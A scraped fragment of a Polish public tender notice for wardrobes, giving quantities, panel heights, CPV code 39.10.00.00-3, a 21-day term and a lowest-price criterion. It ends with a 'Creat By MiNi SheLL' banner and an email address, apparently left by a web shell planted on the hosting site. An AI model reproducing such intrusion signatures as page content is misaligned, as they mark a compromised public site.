j.w + (podział szaf h=800mm, i 1900mm)	2
j.w + (podział szaf h=800mm, i 1900mm	10
j.w + (podział szaf h=800mm, i 1900mm)	5
j.w + (podział szaf h=800mm, i 1900mm)	2
j.w + (podział szaf h=800mm, i 1900mm , szafa narożna)	1
j.w + (podział szaf h=800mm, i 1900mm)	12
Adnotacja do pozycji 1-16. Proszę nie sugerowac się opisem pomieszczeń,  tylko odpowiednim wymiarem podpisanym przy szafie, gdyż nie ma tu zachowanej kolejności wymiarów rysunków, ponieważ w opisie zamówienia szafy są zsumowane..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 21.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com